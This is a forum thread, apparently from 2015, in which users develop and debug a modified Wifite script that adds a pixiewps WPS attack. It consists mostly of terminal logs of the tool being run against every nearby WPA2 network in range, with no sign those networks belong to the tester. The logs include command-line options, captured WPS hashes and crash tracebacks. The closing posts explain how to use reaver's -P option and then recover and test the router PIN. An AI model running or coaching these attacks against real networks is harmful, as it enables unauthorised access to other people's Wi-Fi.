
Thread: Wifite including new pixiewps attack

  1. #11
    Senior Member
    Join Date
    Mar 2015
    Posts
    138
    @noruu fixed typo and added pixie-loop, will be adding a configurable timeout option for pixie attack and will also add option to only attempt pixie attacks (good idea, I like that)

  2. #12
    Senior Member
    Join Date
    Mar 2015
    Posts
    127
    Test parameters:
    Internal wifi card only, quick and dirty.
    Time limited. Netbook with internal wifi card, so all but one of the targets were too far away.
    The one that was close enough for pixie/reaver attack, the script errored during pixie attack.

    Observations:
    The script handled configurable timeout well. (targets too far anyway)

    When Ctrl-C pressed the script moved on to next target well.

    Need the timer for pixie attack, like timer for wps pin attack.
    (cursor just hangs during pixie. countdown if possible)

    Todo:
    I will test script for fails, against more targets and with a stronger external usb wifi card and then post later.

    Code:
    root***:~/wifite-mod-pixiewps-master# ./wifitemod -wps -pixiet 90
    
      .;'                     `;,    
     .;'  ,;'             `;,  `;,   WiFite v2 (r85)
    .;'  ,;'  ,;'     `;,  `;,  `;,  
    ::   ::   :   ( )   :   ::   ::  automated wireless auditor
    ':.  ':.  ':. /_\ ,:'  ,:'  ,:'  
     ':.  ':.    /___\    ,:'  ,:'   designed for Linux
      ':.       /_____\      ,:'     
               /       \             
    
    modified by aanarchyy(aanarchyy@gmail.com)
    Credits to wiire,DataHead,soxrok2212,nxxxu
    
     [+] targeting WPS-enabled networks
     [+] pixiewps attack timeout set to 90 seconds
    
     [+] scanning for wireless devices...
     [+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
     [0:00:04] scanning wireless networks. 0 targets and 0 clients found   
    
     [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
    
       NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
       --- --------------------  --  ----  -----  ----  ------
        1  DG167****              1  WPA2  33db   Locked 
        2  TDS                    6  WPA2  17db   wps 
    
     [0:00:25] scanning wireless networks. 2 targets and 2 clients found   
    
     [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
    
       NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
       --- --------------------  --  ----  -----  ----  ------
        1  DG167****              1  WPA2  34db   Locked 
        2  TDS                    6  WPA2  24db   wps 
        3  TG167****              1  WPA2  21db   wps 
        4  FiOS-S****            1  WPA2  19db   wps 
        5  HAL9000                6  WPA2  15db   wps 
    
     [0:00:48] scanning wireless networks. 5 targets and 9 clients found   
    
     [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
    
       NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
       --- --------------------  --  ----  -----  ----  ------
        1  DG167****              1  WPA2  34db   Locked 
        2  TDS                    6  WPA2  23db   wps 
        3  TG167****              1  WPA2  21db   wps 
        4  FiOS-S****             1  WPA2  16db   wps 
        5  HAL9000                6  WPA2  15db   wps 
    
     [0:01:11] scanning wireless networks. 5 targets and 13 clients found   
     [+] checking for WPS compatibility... done
     [+] removed 49 non-WPS-enabled targets
    
       NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
       --- --------------------  --  ----  -----  ----  ------
        1  DG167****              1  WPA2  34db   Locked 
        2  TDS                    6  WPA2  24db   wps 
        3  TG167****              1  WPA2  20db   wps 
        4  DG167****              1  WPA2  19db   wps 
        5  FiOS-S****             1  WPA2  17db   wps 
        6  HAL9000                6  WPA2  15db   wps 
    
     [+] select target numbers (1-6) separated by commas, or 'all': all
    
     [+] 6 targets selected.
    
     [0:00:00] initializing PixieWPS attack on DG16**** (00:00:00:00:73:90)
    
     [!] unable to complete successful try in 90 seconds
     [+] skipping pixiewps on DG167****
    
     [+] Pixiewps attack failed!
    
     [0:00:00] initializing WPS PIN attack on DG167**** (00:00:00:00:73:90)
    ^C0:00:12] WPS attack, 0/0 success/ttl, 
     (^C) WPS brute-force attack interrupted
    
     [+] 5 targets remain
     [+] what do you want to do?
         [c]ontinue attacking targets
         [e]xit completely
     [+] please make a selection (c, or e): c
    
     [0:00:00] initializing PixieWPS attack on TDS (00:00:00:00:1B:C6)
    
     [!] unable to complete successful try in 90 seconds
     [+] skipping pixiewps on TDS
    
     [+] Pixiewps attack failed!
    
     [0:00:00] initializing WPS PIN attack on TDS (00:00:00:00:1B:C6)
    ^C0:00:25] WPS attack, 0/0 success/ttl, 
     (^C) WPS brute-force attack interrupted
    
     [+] 4 targets remain
     [+] what do you want to do?
         [c]ontinue attacking targets
         [e]xit completely
     [+] please make a selection (c, or e): c
    
     [0:00:00] initializing PixieWPS attack on TG167**** (00:00:00:00:8F:20)
    
     [!] unable to complete successful try in 90 seconds
     [+] skipping pixiewps on TG167****
    
     [+] Pixiewps attack failed!
    
     [0:00:00] initializing WPS PIN attack on TG167**** (00:00:00:00:8F:20)
    ^C0:00:22] WPS attack, 0/0 success/ttl, 
     (^C) WPS brute-force attack interrupted
    
     [+] 3 targets remain
     [+] what do you want to do?
         [c]ontinue attacking targets
         [e]xit completely
     [+] please make a selection (c, or e): c
    
     [0:00:00] initializing PixieWPS attack on DG167**** (00:00:00:00:C4:60)
    
     [!] unable to complete successful try in 90 seconds
     [+] skipping pixiewps on DG167****
    
     [+] Pixiewps attack failed!
    
     [0:00:00] initializing WPS PIN attack on DG167**** (00:00:00:00:C4:60)
    ^C0:00:08] WPS attack, 0/0 success/ttl, 
     (^C) WPS brute-force attack interrupted
    
     [+] 2 targets remain
     [+] what do you want to do?
         [c]ontinue attacking targets
         [e]xit completely
     [+] please make a selection (c, or e): c
    
     [0:00:00] initializing PixieWPS attack on FiOS-S**** (00:00:00:00:EC:C2)
     [+] E-Nonce found
     [+] PKE hash found
     [+] PKR hash found
     [+] E-Hash1 found
     [+] E-Hash2 found
    Traceback (most recent call last):
      File "./wifitemod", line 3134, in <module>
        main()
      File "./wifitemod", line 321, in main
        need_handshake = not wps_attack(iface, t)
      File "./wifitemod", line 2931, in wps_attack
        os.remove(temp + "reaver_err.out")
    OSError: [Errno 2] No such file or directory: '/tmp/wifite0jkPaB/reaver_err.out'
    root@****:~/wifite-mod-pixiewps-master#
    Great progress!!

  3. #13
    Senior Member
    Join Date
    Mar 2015
    Posts
    127
    Also on little netbook that I haven't upgraded aircrack-ng suite, interface creation/usage perfect.

  4. #14
    Senior Member
    Join Date
    Mar 2015
    Posts
    138
    Updated!
    Added -pixiet <sec> to configure pixiewps timeout
    Added -ponly to set to only attack using pixiewps
    Fixed ctrl^c issue

  5. #15
    Senior Member
    Join Date
    Mar 2015
    Posts
    127
    Code:
    root@kali:~/wifite-mod-pixiewps-master# ./wifitemod -ponly -pixiet 45
    
      .;'                     `;,    
     .;'  ,;'             `;,  `;,   WiFite v2 (r86)
    .;'  ,;'  ,;'     `;,  `;,  `;,  
    ::   ::   :   ( )   :   ::   ::  automated wireless auditor
    ':.  ':.  ':. /_\ ,:'  ,:'  ,:'  
     ':.  ':.    /___\    ,:'  ,:'   designed for Linux
      ':.       /_____\      ,:'     
               /       \             
    
    modified by aanarchyy(aanarchyy@gmail.com)
    Credits to wiire,DataHead,soxrok2212,nxxxu
    
     [+] Pixiewps attack only enabled
     [+] pixie attack timeout set to 45 seconds
    
     [+] scanning for wireless devices...
     [+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
     [0:00:04] scanning wireless networks. 0 targets and 0 clients found   
    
     [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
    
       NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
       --- --------------------  --  ----  -----  ----  ------
        1  \x00\x00\x001000   6  WPA2  65db   wps 
        2  b0c554a1000           1  WPA2  64db   wps 
        3  DVW32011000             1  WPA2  56db   wps 
        4  atlantis201000       10  WPA2  53db   wps 
        5  WileyR1000            10  WPA2  52db   wps 
        6  DVW321000             1  WPA2  51db   wps 
        7  133 1000  1000             6  WPA2  51db   Locked 
        8  Onyx1100023                1  WPA2  50db   wps 
        9  TommyA1000            6  WPA2  50db   wps 
       10  Kirin1000              1  WPA2  49db   wps 
       11  DG16701000             11  WPA2  48db   wps 
       12  We hear y1000  6  WPA2  48db   wps 
       13  \x00\x00\1000       11  WPA2  47db   wps 
       14  DG11000             11  WPA2  46db   wps 
       15  DG11000              1  WPA2  45db   Locked 
       16  Tuppy Gl1000          6  WPA2  45db   Locked 
       17  lind1000          11  WPA2  44db   wps 
       18  DG11000              1  WPA2  40db   Locked 
    
     [0:00:06] scanning wireless networks. 18 targets and 3 clients found   
    
     [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
    
       NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
       --- --------------------  --  ----  -----  ----  ------
        1  \x00\x00\x001000   6  WPA2  65db   wps 
        2  b0c554a1000           1  WPA2  64db   wps 
        3  DVW32011000             1  WPA2  56db   wps 
        4  atlantis201000       10  WPA2  53db   wps 
        5  WileyR1000            10  WPA2  52db   wps 
        6  DVW321000             1  WPA2  51db   wps 
        7  133 1000  1000             6  WPA2  51db   Locked 
        8  Onyx1100023                1  WPA2  50db   wps 
        9  TommyA1000            6  WPA2  50db   wps 
       10  Kirin1000              1  WPA2  49db   wps 
       11  DG16701000             11  WPA2  48db   wps 
       12  We hear y1000  6  WPA2  48db   wps 
       13  \x00\x00\1000       11  WPA2  47db   wps 
       14  DG11000             11  WPA2  46db   wps 
       15  DG11000              1  WPA2  45db   Locked 
       16  Tuppy Gl1000          6  WPA2  45db   Locked 
       17  lind1000          11  WPA2  44db   wps 
       18  DG11000              1  WPA2  40db   Locked 
    
     [0:00:21] scanning wireless networks. 18 targets and 3 clients found   
    
     [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
    
       NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
       --- --------------------  --  ----  -----  ----  ------
        1  \x00\x00\x001000   6  WPA2  65db   wps 
        2  b0c554a1000           1  WPA2  64db   wps 
        3  DVW32011000             1  WPA2  56db   wps 
        4  atlantis201000       10  WPA2  53db   wps 
        5  WileyR1000            10  WPA2  52db   wps 
        6  DVW321000             1  WPA2  51db   wps 
        7  133 1000  1000             6  WPA2  51db   Locked 
        8  Onyx1100023                1  WPA2  50db   wps 
        9  TommyA1000            6  WPA2  50db   wps 
       10  Kirin1000              1  WPA2  49db   wps 
       11  DG16701000             11  WPA2  48db   wps 
       12  We hear y1000  6  WPA2  48db   wps 
       13  \x00\x00\1000       11  WPA2  47db   wps 
       14  DG11000             11  WPA2  46db   wps 
       15  DG11000              1  WPA2  45db   Locked 
       16  Tuppy Gl1000          6  WPA2  45db   Locked 
       17  lind1000          11  WPA2  44db   wps 
       18  DG11000              1  WPA2  40db   Locked 
       19  linda1000           11  WPA2  45db   wps 
       20  \x00\x00\x00\x00\...  11  WPA2  45db   wps 
       21  ZOOM                   6  WPA2  44db   wps 
       22  DG1671000              1  WPA2  41db   Locked 
       23  McPo1000               6  WPA2  40db   wps 
       24  DG1671000              1  WPA2  40db   Locked 
    
     [0:00:29] scanning wireless networks. 24 targets and 14 clients found   
     [+] checking for WPS compatibility... done
     [+] removed 35 non-WPS-enabled target
    
    
       NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
       --- --------------------  --  ----  -----  ----  ------
        1  \x00\x00\x001000   6  WPA2  65db   wps 
        2  b0c554a1000           1  WPA2  64db   wps 
        3  DVW32011000             1  WPA2  56db   wps 
        4  atlantis201000       10  WPA2  53db   wps 
        5  WileyR1000            10  WPA2  52db   wps 
        6  DVW321000             1  WPA2  51db   wps 
        7  133 1000  1000             6  WPA2  51db   Locked 
        8  Onyx1100023                1  WPA2  50db   wps 
        9  TommyA1000            6  WPA2  50db   wps 
       10  Kirin1000              1  WPA2  49db   wps 
       11  DG16701000             11  WPA2  48db   wps 
       12  We hear y1000  6  WPA2  48db   wps 
       13  \x00\x00\1000       11  WPA2  47db   wps 
       14  DG11000             11  WPA2  46db   wps 
       15  DG11000              1  WPA2  45db   Locked 
       16  Tuppy Gl1000          6  WPA2  45db   Locked 
       17  lind1000          11  WPA2  44db   wps 
       18  DG11000              1  WPA2  40db   Locked 
       19  linda1000           11  WPA2  45db   wps 
       20  \x00\x00\x00\x00\...  11  WPA2  45db   wps 
       21  ZOOM                   6  WPA2  44db   wps 
       22  DG1671000              1  WPA2  41db   Locked 
       23  McPo1000               6  WPA2  40db   wps 
       24  DG1671000              1  WPA2  40db   Locked 
       25  McP1000               6  WPA2  42db   wps   client
       26  DG1671000              1  WPA2  42db   Locked 
       27  DG1671000              1  WPA2  41db   Locked 
       28  TG1671000              6  WPA2  40db   wps 
       29  THWL9                  1  WPA2  38db   wps 
    
     [+] select target numbers (1-29) separated by commas, or 'all': all
    
     [+] 29 targets selected.
    
     [0:00:00] initializing PixieWPS attack on \x00\x00\x00\x00\x00\x 1000:79:0F)
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on \x00\x00\x00\x00\x00\x
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on \x00\x00\x00\x00\x00\x
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on \x00\x00\x00\x00\x00\x
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on \x00\x00\x00\x00\x00\x
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on \x00\x00\x00\x00\x00\x
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on \x00\x00\x00\x00\x00\x
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on \x00\x00\x00\x00\x00\x
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on \x00\x00\x00\x00\x00\x
    ^C
     (^C) WPS brute-force attack interrupted
    
     [+] 28 targets remain
     [+] what do you want to do?
         [c]ontinue attacking targets
         [e]xit completely
     [+] please make a selection (c, or e): c
    
    
     (^C) WPS brute-force attack interrupted
    
     [+] 27 targets remain
     [+] what do you want to do?
         [c]ontinue attacking targets
         [e]xit completely
     [+] please make a selection (c, or e): c
    
     [+] Pixiewps attack failed!
    
     [0:00:00] initializing PixieWPS attack on b0c554a1000 (1000:A7:86)
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on b0c554a1000
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on b0c554a1000
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on b0c554a1000
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on b0c554a1000
    
     [!] unable to complete successful try in 45 seconds
     [+] skipping pixiewps on b0c554a1000
    ^C
     (^C) WPS brute-force attack interrupted
    
     [+] 26 targets remain
     [+] what do you want to do?
         [c]ontinue attacking targets
         [e]xit completely
     [+] please make a selection (c, or e): ^C
     (^C) WPS brute-force attack interrupted
    
     [+] 26 targets remain
     [+] what do you want to do?
         [c]ontinue attacking targets
         [e]xit completely
     [+] please make a selection (c, or e): ^CTraceback (most recent call last):
      File "./wifitemod", line 3150, in <module>
        if attack_interrupted_prompt():
      File "./wifitemod", line 1801, in attack_interrupted_prompt
        ri = raw_input(GR+' [+]'+W+' please make a selection (%s): ' % options)
    KeyboardInterrupt
    Stuck in loop after pixie attack fails

  6. #16
    Senior Member
    Join Date
    Mar 2015
    Posts
    127
    if ./wifite -pixiet (no time given)

    script handles ./wifite -pixiet<null> nicely.

    Also in previous version -ponly had no acknowledgement of being set to active, this version says it's active.
    Last edited by nuroo; 2015-04-21 at 01:51 AM.

  7. #17
    Senior Member
    Join Date
    Mar 2015
    Posts
    138
    Quote: Originally posted by nuroo

    Stuck in loop after pixie attack fails
    Yeah, just noticed that also, gimme a min to fix, just had it fixed then testbed crashed so I gotta remember what I did... :-/

    Edit: Should be fixed now. I want to thank you again for helping me test this.
    Last edited by aanarchyy; 2015-04-21 at 02:03 AM.

  8. #18
    Senior Member
    Join Date
    Mar 2015
    Posts
    127
    ./wifite -ponly -pixiet 75 -pow 35

    Worked no errors. 8 targets. Ctrl-C on a few I knew wouldn't crack, no crash. -NICE

    No successful pixie attack though. Gonna increase timeout test pixie attack portion.

  9. #19
    Senior Member
    Join Date
    Mar 2015
    Posts
    127
    When given enough info for successful attack against known vulnerable AP:
    [0:00:00] initializing PixieWPS attack on DG167000 (0000000:27:80)
    [+] E-Nonce found
    [+] PKE hash found
    [+] PKR hash found
    [+] Authkey found
    [+] E-Hash1 found
    [+] E-Hash2 found
    script seems to stand still, no error but no output

    Is that because -P option used in reaver? If -P option loop used, so no M4, so no wps lockout?

    If so, then do you feed successful results to offline pixie attack to obtain pin? The new reaver to test pin?

  10. #20
    Senior Member
    Join Date
    Jul 2013
    Location
    United States
    Posts
    515
    Quote: Originally posted by nuroo
    When given enough info for successful attack against known vulnerable AP:
    [0:00:00] initializing PixieWPS attack on DG167000 (0000000:27:80)
    [+] E-Nonce found
    [+] PKE hash found
    [+] PKR hash found
    [+] Authkey found
    [+] E-Hash1 found
    [+] E-Hash2 found
    script seems to stand still, no error but no output

    Is that because -P option used in reaver? If -P option loop used, so no M4, so no wps lockout?

    If so, then do you feed successful results to offline pixie attack to obtain pin? The new reaver to test pin?
    Yeah, the -P switch will stop M4 from being sent at all. Just run reaver after and supply the correct pin.
